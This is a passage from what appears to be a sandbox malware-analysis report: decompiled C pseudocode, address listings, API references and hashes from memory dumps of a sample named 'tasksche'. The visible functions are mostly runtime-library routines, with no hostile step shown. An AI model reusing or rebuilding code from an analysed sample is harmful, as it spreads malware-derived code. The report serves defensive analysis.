                                                                                              				if(_t72 == 0 || _a12 == 0) {
                                                                                              					L5:
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					if( *_t72 != 0) {
                                                                                              						E0041D0C8( &_v20, _a16);
                                                                                              						_t43 = _v20;
                                                                                              						__eflags =  *(_t43 + 0x14);
                                                                                              						if( *(_t43 + 0x14) != 0) {
                                                                                              							_t46 = E00422793( *_t72 & 0x000000ff,  &_v20);
                                                                                              							__eflags = _t46;
                                                                                              							if(_t46 == 0) {
                                                                                              								__eflags = _a4;
                                                                                              								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
                                                                                              								if(__eflags != 0) {
                                                                                              									L10:
                                                                                              									__eflags = _v8;
                                                                                              									if(_v8 != 0) {
                                                                                              										_t53 = _v12;
                                                                                              										_t11 = _t53 + 0x70;
                                                                                              										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                                                                                              										__eflags =  *_t11;
                                                                                              									}
                                                                                              									return 1;
                                                                                              								}
                                                                                              								L21:
                                                                                              								_t54 = E0041EDAE(__eflags);
                                                                                              								 *_t54 = 0x2a;
                                                                                              								__eflags = _v8;
                                                                                              								if(_v8 != 0) {
                                                                                              									_t54 = _v12;
                                                                                              									_t33 = _t54 + 0x70;
                                                                                              									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                              									__eflags =  *_t33;
                                                                                              								}
                                                                                              								return _t54 | 0xffffffff;
                                                                                              							}
                                                                                              							_t56 = _v20;
                                                                                              							_t65 =  *(_t56 + 0xac);
                                                                                              							__eflags = _t65 - 1;
                                                                                              							if(_t65 <= 1) {
                                                                                              								L17:
                                                                                              								__eflags = _a12 -  *(_t56 + 0xac);
                                                                                              								if(__eflags < 0) {
                                                                                              									goto L21;
                                                                                              								}
                                                                                              								__eflags = _t72[1];
                                                                                              								if(__eflags == 0) {
                                                                                              									goto L21;
                                                                                              								}
                                                                                              								L19:
                                                                                              								_t57 =  *(_t56 + 0xac);
                                                                                              								__eflags = _v8;
                                                                                              								if(_v8 == 0) {
                                                                                              									return _t57;
                                                                                              								}
                                                                                              								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                              								return _t57;
                                                                                              							}
                                                                                              							__eflags = _a12 - _t65;
                                                                                              							if(_a12 < _t65) {
                                                                                              								goto L17;
                                                                                              							}
                                                                                              							__eflags = _a4;
                                                                                              							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                              							__eflags = _t58;
                                                                                              							_t56 = _v20;
                                                                                              							if(_t58 != 0) {
                                                                                              								goto L19;
                                                                                              							}
                                                                                              							goto L17;
                                                                                              						}
                                                                                              						_t59 = _a4;
                                                                                              						__eflags = _t59;
                                                                                              						if(_t59 != 0) {
                                                                                              							 *_t59 =  *_t72 & 0x000000ff;
                                                                                              						}
                                                                                              						goto L10;
                                                                                              					} else {
                                                                                              						_t60 = _a4;
                                                                                              						if(_t60 != 0) {
                                                                                              							 *_t60 = 0;
                                                                                              						}
                                                                                              						goto L5;
                                                                                              					}
                                                                                              				}
                                                                                              			}

















                                                                                              0x00424fd8
                                                                                              0x00424fdf
                                                                                              0x00424ff6
                                                                                              0x00000000
                                                                                              0x00424fe6
                                                                                              0x00424fe8
                                                                                              0x00425002
                                                                                              0x00425007
                                                                                              0x0042500a
                                                                                              0x0042500d
                                                                                              0x00425036
                                                                                              0x0042503d
                                                                                              0x0042503f
                                                                                              0x004250c0
                                                                                              0x004250db
                                                                                              0x004250dd
                                                                                              0x0042501d
                                                                                              0x0042501d
                                                                                              0x00425020
                                                                                              0x00425022
                                                                                              0x00425025
                                                                                              0x00425025
                                                                                              0x00425025
                                                                                              0x00425025
                                                                                              0x00000000
                                                                                              0x0042502b
                                                                                              0x0042509f
                                                                                              0x0042509f
                                                                                              0x004250a4
                                                                                              0x004250aa
                                                                                              0x004250ad
                                                                                              0x004250af
                                                                                              0x004250b2
                                                                                              0x004250b2
                                                                                              0x004250b2
                                                                                              0x004250b2
                                                                                              0x00000000
                                                                                              0x004250b6
                                                                                              0x00425041
                                                                                              0x00425044
                                                                                              0x0042504a
                                                                                              0x0042504d
                                                                                              0x00425074
                                                                                              0x00425077
                                                                                              0x0042507d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0042507f
                                                                                              0x00425082
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00425084
                                                                                              0x00425084
                                                                                              0x0042508a
                                                                                              0x0042508d
                                                                                              0x00424ffb
                                                                                              0x00424ffb
                                                                                              0x00425096
                                                                                              0x00000000
                                                                                              0x00425096
                                                                                              0x0042504f
                                                                                              0x00425052
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00425056
                                                                                              0x00425067
                                                                                              0x0042506d
                                                                                              0x0042506f
                                                                                              0x00425072
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00425072
                                                                                              0x0042500f
                                                                                              0x00425012
                                                                                              0x00425014
                                                                                              0x0042501a
                                                                                              0x0042501a
                                                                                              0x00000000
                                                                                              0x00424fea
                                                                                              0x00424fea
                                                                                              0x00424fef
                                                                                              0x00424ff3
                                                                                              0x00424ff3
                                                                                              0x00000000
                                                                                              0x00424fef
                                                                                              0x00424fe8

                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00425002
                                                                                              • __isleadbyte_l.LIBCMT ref: 00425036
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,0041A9BA,?,00000000,00000000,?,?,?,?,0041A9BA,00000000,?), ref: 00425067
                                                                                              • MultiByteToWideChar.KERNEL32(00000080,00000009,0041A9BA,00000001,00000000,00000000,?,?,?,?,0041A9BA,00000000,?), ref: 004250D5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: 5ede48c89caf3767bd10844c4e2adb50473344288511d083f5bbcd5d287f352f
                                                                                              • Instruction ID: 432046cfce088e341913eb2016d1b5e66f5b1b0e2666f0ac1bd271c546b36d2c
                                                                                              • Opcode Fuzzy Hash: 5ede48c89caf3767bd10844c4e2adb50473344288511d083f5bbcd5d287f352f
                                                                                              • Instruction Fuzzy Hash: C831D131B00265EFDB20DF64EC809BA7BA0EF41310F5685AAE4618B2D1D735D981DB99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00413097(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                              				void* __edi;
                                                                                              				char _t21;
                                                                                              				void* _t25;
                                                                                              				char _t27;
                                                                                              				char _t31;
                                                                                              				void* _t32;
                                                                                              				char _t33;
                                                                                              				void* _t34;
                                                                                              
                                                                                              				_t34 = __ecx;
                                                                                              				_t27 = 1;
                                                                                              				 *((char*)(__ecx + 0xa6c)) = 1;
                                                                                              				 *((intOrPtr*)(__ecx + 0x660)) = _a4;
                                                                                              				E00412F1C(__ecx, __edx, __eflags);
                                                                                              				 *((char*)(__ecx + 0x86c)) = 0;
                                                                                              				 *((char*)(__ecx + 0x86d)) = 2;
                                                                                              				E0041A820(_t32, __ecx + 0x86e, 4, 9);
                                                                                              				E0041A820(_t32, _t34 + 0x877, 6, 0xf5);
                                                                                              				_t21 = 0;
                                                                                              				do {
                                                                                              					 *((char*)(_t34 + _t21 + 0x76c)) = _t21;
                                                                                              					_t21 = _t21 + 1;
                                                                                              				} while (_t21 < 3);
                                                                                              				_t31 = _t21;
                                                                                              				_t33 = 1;
                                                                                              				while(_t21 < 0x100) {
                                                                                              					_t33 = _t33 - 1;
                                                                                              					__eflags = _t33;
                                                                                              					 *((char*)(_t34 + _t21 + 0x76c)) = _t31;
                                                                                              					if(_t33 == 0) {
                                                                                              						_t27 = _t27 + 1;
                                                                                              						_t33 = _t27;
                                                                                              						_t31 = _t31 + 1;
                                                                                              						__eflags = _t31;
                                                                                              					}
                                                                                              					_t21 = _t21 + 1;
                                                                                              					__eflags = _t21;
                                                                                              				}
                                                                                              				E0041A820(_t33, _t34 + 0x96c, 0, 0x40);
                                                                                              				_t25 = E0041A820(_t33, _t34 + 0x9ac, 8, 0xc0);
                                                                                              				 *((char*)(_t34 + 0x642)) = 7;
                                                                                              				return _t25;
                                                                                              			}











                                                                                              0x0041309d
                                                                                              0x004130a1
                                                                                              0x004130a3
                                                                                              0x004130a9
                                                                                              0x004130af
                                                                                              0x004130bf
                                                                                              0x004130c6
                                                                                              0x004130cd
                                                                                              0x004130e0
                                                                                              0x004130e8
                                                                                              0x004130ea
                                                                                              0x004130ea
                                                                                              0x004130f1
                                                                                              0x004130f2
                                                                                              0x004130f7
                                                                                              0x004130f9
                                                                                              0x00413111
                                                                                              0x00413102
                                                                                              0x00413102
                                                                                              0x00413103
                                                                                              0x0041310a
                                                                                              0x0041310c
                                                                                              0x0041310d
                                                                                              0x0041310f
                                                                                              0x0041310f
                                                                                              0x0041310f
                                                                                              0x00413110
                                                                                              0x00413110
                                                                                              0x00413110
                                                                                              0x00413120
                                                                                              0x00413133
                                                                                              0x0041313c
                                                                                              0x00413145

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID:
                                                                                              • API String ID: 2102423945-0
                                                                                              • Opcode ID: 0d338722b2e3e51696f4e1a05dd7a6835afd7bcab5979c6f78e2f817af711592
                                                                                              • Instruction ID: dbb621f027503421eccd8689c294ebf88999011181a54c0115c225b35bd7b5a3
                                                                                              • Opcode Fuzzy Hash: 0d338722b2e3e51696f4e1a05dd7a6835afd7bcab5979c6f78e2f817af711592
                                                                                              • Instruction Fuzzy Hash: 9811487164478069E220EA7A4C46FE3B6DD9B1931CF44883FF2DEC7183C6AA6846C756
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 42%
                                                                                              			E00411072(void* __ecx, void* __edx, void* __edi) {
                                                                                              				void* __ebx;
                                                                                              				intOrPtr _t11;
                                                                                              				intOrPtr _t12;
                                                                                              				long* _t15;
                                                                                              				intOrPtr _t16;
                                                                                              				long* _t23;
                                                                                              				void* _t26;
                                                                                              				intOrPtr _t31;
                                                                                              				void* _t32;
                                                                                              
                                                                                              				_t27 = __edi;
                                                                                              				_t26 = __edx;
                                                                                              				E0041A4DC(E004297F9, _t32);
                                                                                              				_push(__ecx);
                                                                                              				EnterCriticalSection(0x44f590);
                                                                                              				_t11 =  *0x44f588; // 0x0
                                                                                              				 *0x44f588 =  *0x44f588 + 1;
                                                                                              				_t35 = _t11;
                                                                                              				if(_t11 == 0) {
                                                                                              					_push(0x1b8);
                                                                                              					_t15 = E0041A89A(0x44f590, _t26, __edi, _t35);
                                                                                              					 *((intOrPtr*)(_t32 - 0x10)) = _t15;
                                                                                              					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
                                                                                              					if(_t15 == 0) {
                                                                                              						_t16 = 0;
                                                                                              						__eflags = 0;
                                                                                              					} else {
                                                                                              						_t16 = E00410F29(_t15, 0x20);
                                                                                              					}
                                                                                              					 *(_t32 - 4) =  *(_t32 - 4) | 0xffffffff;
                                                                                              					 *0x44f584 = _t16;
                                                                                              				}
                                                                                              				_t38 =  *0x44f588 - 1;
                                                                                              				if( *0x44f588 <= 1) {
                                                                                              					LeaveCriticalSection(0x44f590);
                                                                                              					_t12 =  *0x44f584; // 0x22111f0
                                                                                              				} else {
                                                                                              					_push(0x1b8);
                                                                                              					_t23 = E0041A89A(0x44f590, _t26, _t27, _t38);
                                                                                              					 *((intOrPtr*)(_t32 - 0x10)) = _t23;
                                                                                              					 *(_t32 - 4) = 1;
                                                                                              					if(_t23 == 0) {
                                                                                              						_t31 = 0;
                                                                                              						__eflags = 0;
                                                                                              					} else {
                                                                                              						_t31 = E00410F29(_t23, 0x20);
                                                                                              					}
                                                                                              					LeaveCriticalSection(0x44f590);
                                                                                              					_t12 = _t31;
                                                                                              				}
                                                                                              				 *[fs:0x0] =  *((intOrPtr*)(_t32 - 0xc));
                                                                                              				return _t12;
                                                                                              			}












                                                                                              0x00411072
                                                                                              0x00411072
                                                                                              0x00411077
                                                                                              0x0041107c
                                                                                              0x00411085
                                                                                              0x0041108b
                                                                                              0x00411090
                                                                                              0x0041109b
                                                                                              0x0041109d
                                                                                              0x0041109f
                                                                                              0x004110a0
                                                                                              0x004110a6
                                                                                              0x004110a9
                                                                                              0x004110af
                                                                                              0x004110bc
                                                                                              0x004110bc
                                                                                              0x004110b1
                                                                                              0x004110b5
                                                                                              0x004110b5
                                                                                              0x004110be
                                                                                              0x004110c2
                                                                                              0x004110c2
                                                                                              0x004110c7
                                                                                              0x004110ce
                                                                                              0x00411100
                                                                                              0x00411106
                                                                                              0x004110d0
                                                                                              0x004110d0
                                                                                              0x004110d7
                                                                                              0x004110d9
                                                                                              0x004110dc
                                                                                              0x004110e5
                                                                                              0x004110f2
                                                                                              0x004110f2
                                                                                              0x004110e7
                                                                                              0x004110ee
                                                                                              0x004110ee
                                                                                              0x004110f5
                                                                                              0x004110fb
                                                                                              0x004110fb
                                                                                              0x00411110
                                                                                              0x00411118

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00411077
                                                                                              • EnterCriticalSection.KERNEL32(0044F590,?,?,?,00409901,?,?,?,0040BB60,?,?,00000000,?,?,004124ED,?), ref: 00411085
                                                                                              • LeaveCriticalSection.KERNEL32(0044F590,?,00409901,?,?,?,0040BB60,?,?,00000000,?,?,004124ED,?,?,?), ref: 004110F5
                                                                                                • Part of subcall function 0041A89A: _malloc.LIBCMT ref: 0041A8B4
                                                                                              • LeaveCriticalSection.KERNEL32(0044F590,?,00409901,?,?,?,0040BB60,?,?,00000000,?,?,004124ED,?,?,?), ref: 00411100
                                                                                                • Part of subcall function 00410F29: InitializeCriticalSection.KERNEL32(000001A0,?,000001B8,0044F590,004110EE,00000020,?,00409901,?,?,?,0040BB60,?,?,00000000,?), ref: 00410F62
                                                                                                • Part of subcall function 00410F29: CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,00409901,?,?,?,0040BB60,?,?,00000000,?,?,004124ED), ref: 00410F6C
                                                                                                • Part of subcall function 00410F29: CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,00409901,?,?,?,0040BB60,?,?,00000000,?,?,004124ED), ref: 00410F7E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$CreateLeave$EnterEventH_prologInitializeSemaphore_malloc
                                                                                              • String ID:
                                                                                              • API String ID: 1405584564-0
                                                                                              • Opcode ID: 3f0bec743d3c3e54beb4ca038bcc84bad5a4a530a73f67f15a7eea00e341295c
                                                                                              • Instruction ID: 491e5497db774d6ab3e78c5f78b9db4af1dc916e288055147b814ae628d52a75
                                                                                              • Opcode Fuzzy Hash: 3f0bec743d3c3e54beb4ca038bcc84bad5a4a530a73f67f15a7eea00e341295c
                                                                                              • Instruction Fuzzy Hash: 1A118234A01321EBD724AF74AC457EABBA4AB0C355F10453BE902E3692DBBC89D1865D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0042332E(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                              				intOrPtr _t25;
                                                                                              				void* _t26;
                                                                                              				void* _t28;
                                                                                              
                                                                                              				_t25 = _a16;
                                                                                              				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                              					_t26 = E00422C1F(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                              					goto L9;
                                                                                              				} else {
                                                                                              					_t34 = _t25 - 0x66;
                                                                                              					if(_t25 != 0x66) {
                                                                                              						__eflags = _t25 - 0x61;
                                                                                              						if(_t25 == 0x61) {
                                                                                              							L7:
                                                                                              							_t26 = E00422D0F(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                              						} else {
                                                                                              							__eflags = _t25 - 0x41;
                                                                                              							if(__eflags == 0) {
                                                                                              								goto L7;
                                                                                              							} else {
                                                                                              								_t26 = E00423234(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                              							}
                                                                                              						}
                                                                                              						L9:
                                                                                              						return _t26;
                                                                                              					} else {
                                                                                              						return E00423179(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                              					}
                                                                                              				}
                                                                                              			}






                                                                                              0x00423333
                                                                                              0x00423339
                                                                                              0x004233ac
                                                                                              0x00000000
                                                                                              0x00423340
                                                                                              0x00423340
                                                                                              0x00423343
                                                                                              0x0042335e
                                                                                              0x00423361
                                                                                              0x00423381
                                                                                              0x00423393
                                                                                              0x00423363
                                                                                              0x00423363
                                                                                              0x00423366
                                                                                              0x00000000
                                                                                              0x00423368
                                                                                              0x0042337a
                                                                                              0x0042337a
                                                                                              0x00423366
                                                                                              0x004233b1
                                                                                              0x004233b5
                                                                                              0x00423345
                                                                                              0x0042335d
                                                                                              0x0042335d
                                                                                              0x00423343

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                              • String ID:
                                                                                              • API String ID: 3016257755-0
                                                                                              • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                              • Instruction ID: 44ddc5ebc1807cb1f8dbc3b2ce9dd0a677749795dee404b17e6a32e81244ff51
                                                                                              • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                                                                                              • Instruction Fuzzy Hash: AE11723250015EFBCF125E85EC418EE3F32BB48355B988456FE1859130CA3ACAB2AB85
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00411A8F(void* __ecx, intOrPtr _a4) {
                                                                                              				short _v4612;
                                                                                              				long _t11;
                                                                                              				int _t14;
                                                                                              				signed int _t16;
                                                                                              
                                                                                              				E0041AAF0(0x1200);
                                                                                              				E0040BC16( &_v4612, 0x900, E0040C3BF(0x83), _a4);
                                                                                              				_t11 = GetLastError();
                                                                                              				_t14 = MessageBoxW( *0x441840,  &_v4612, E0040C3BF(0x96), 0x35);
                                                                                              				SetLastError(_t11);
                                                                                              				return _t16 & 0xffffff00 | _t14 == 0x00000004;
                                                                                              			}







                                                                                              0x00411a97
                                                                                              0x00411ab8
                                                                                              0x00411ac0
                                                                                              0x00411ae2
                                                                                              0x00411aef
                                                                                              0x00411afa

                                                                                              APIs
                                                                                                • Part of subcall function 0040C3BF: LoadStringW.USER32(?,-004335D2,00000200), ref: 0040C410
                                                                                                • Part of subcall function 0040C3BF: LoadStringW.USER32(?,-004335D2,00000200), ref: 0040C422
                                                                                              • _swprintf.LIBCMT ref: 00411AB8
                                                                                                • Part of subcall function 0040BC16: __vswprintf_c_l.LIBCMT ref: 0040BC29
                                                                                              • GetLastError.KERNEL32(?), ref: 00411AC0
                                                                                              • MessageBoxW.USER32(?,00000000,00000096,00000035), ref: 00411AE2
                                                                                              • SetLastError.KERNEL32(00000000), ref: 00411AEF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastLoadString$Message__vswprintf_c_l_swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2205000856-0
                                                                                              • Opcode ID: 68bc4feaeb3ec1ded5fc4cddc0e8f758a38e28cbc6004bdae2a7d7facef01b9c
                                                                                              • Instruction ID: 7f3341f69499fe42e6dffd8e50f304e55c87ac1a4f55305a7eb793650ce5b90b
                                                                                              • Opcode Fuzzy Hash: 68bc4feaeb3ec1ded5fc4cddc0e8f758a38e28cbc6004bdae2a7d7facef01b9c
                                                                                              • Instruction Fuzzy Hash: 74F02732140114ABF71137E08C4AECA379CFB087C5F000277FA01F21A2EA79996487BD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 90%
                                                                                              			E00422313(void* __ebx, void* __edx, intOrPtr __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _t13;
                                                                                              				intOrPtr _t28;
                                                                                              				void* _t29;
                                                                                              				void* _t30;
                                                                                              
                                                                                              				_t30 = __eflags;
                                                                                              				_t26 = __edi;
                                                                                              				_t25 = __edx;
                                                                                              				_t22 = __ebx;
                                                                                              				_push(0xc);
                                                                                              				_push(0x42da10);
                                                                                              				E0041FA9C(__ebx, __edi, __esi);
                                                                                              				_t28 = E0041E9B4(__ebx, __edx, __edi, _t30);
                                                                                              				_t13 =  *0x430da4; // 0xfffffffe
                                                                                              				if(( *(_t28 + 0x70) & _t13) == 0) {
                                                                                              					L6:
                                                                                              					E0041EFA3(_t22, 0xc);
                                                                                              					 *(_t29 - 4) =  *(_t29 - 4) & 0x00000000;
                                                                                              					_t8 = _t28 + 0x6c; // 0x6c
                                                                                              					_t26 =  *0x430e88; // 0x430db0
                                                                                              					 *((intOrPtr*)(_t29 - 0x1c)) = E004222D5(_t8, _t26);
                                                                                              					 *(_t29 - 4) = 0xfffffffe;
                                                                                              					E0042237D();
                                                                                              				} else {
                                                                                              					_t32 =  *((intOrPtr*)(_t28 + 0x6c));
                                                                                              					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
                                                                                              						goto L6;
                                                                                              					} else {
                                                                                              						_t28 =  *((intOrPtr*)(E0041E9B4(_t22, __edx, _t26, _t32) + 0x6c));
                                                                                              					}
                                                                                              				}
                                                                                              				if(_t28 == 0) {
                                                                                              					E00421495(_t25, _t26, 0x20);
                                                                                              				}
                                                                                              				return E0041FAE1(_t28);
                                                                                              			}







                                                                                              0x00422313
                                                                                              0x00422313
                                                                                              0x00422313
                                                                                              0x00422313
                                                                                              0x00422313
                                                                                              0x00422315
                                                                                              0x0042231a
                                                                                              0x00422324
                                                                                              0x00422326
                                                                                              0x0042232e
                                                                                              0x00422352
                                                                                              0x00422354
                                                                                              0x0042235a
                                                                                              0x0042235e
                                                                                              0x00422361
                                                                                              0x0042236c
                                                                                              0x0042236f
                                                                                              0x00422376
                                                                                              0x00422330
                                                                                              0x00422330
                                                                                              0x00422334
                                                                                              0x00000000
                                                                                              0x00422336
                                                                                              0x0042233b
                                                                                              0x0042233b
                                                                                              0x00422334
                                                                                              0x00422340
                                                                                              0x00422344
                                                                                              0x00422349
                                                                                              0x00422351

                                                                                              APIs
                                                                                              • __getptd.LIBCMT ref: 0042231F
                                                                                                • Part of subcall function 0041E9B4: __getptd_noexit.LIBCMT ref: 0041E9B7
                                                                                                • Part of subcall function 0041E9B4: __amsg_exit.LIBCMT ref: 0041E9C4
                                                                                              • __getptd.LIBCMT ref: 00422336
                                                                                              • __amsg_exit.LIBCMT ref: 00422344
                                                                                              • __lock.LIBCMT ref: 00422354
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                                                                                              • String ID:
                                                                                              • API String ID: 3521780317-0
                                                                                              • Opcode ID: 2067aca802aea6c84e1c6e0627a9ce2a9215c14d0a893de0c815b7a1e0d9c920
                                                                                              • Instruction ID: ac1e04e8c31356b773b53a495aea9e08dc5a2d3a98daccf88dafce2968103349
                                                                                              • Opcode Fuzzy Hash: 2067aca802aea6c84e1c6e0627a9ce2a9215c14d0a893de0c815b7a1e0d9c920
                                                                                              • Instruction Fuzzy Hash: D2F09631B00720EBDB60FBB6A50279D73A07F44724F54416FE844AB2D1CBBC9942DA5E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 69%
                                                                                              			E00409DF7(intOrPtr _a4, intOrPtr _a8, signed char _a12) {
                                                                                              				char _v4100;
                                                                                              				char _v8196;
                                                                                              				short _t35;
                                                                                              				signed int _t38;
                                                                                              				short _t48;
                                                                                              				short _t50;
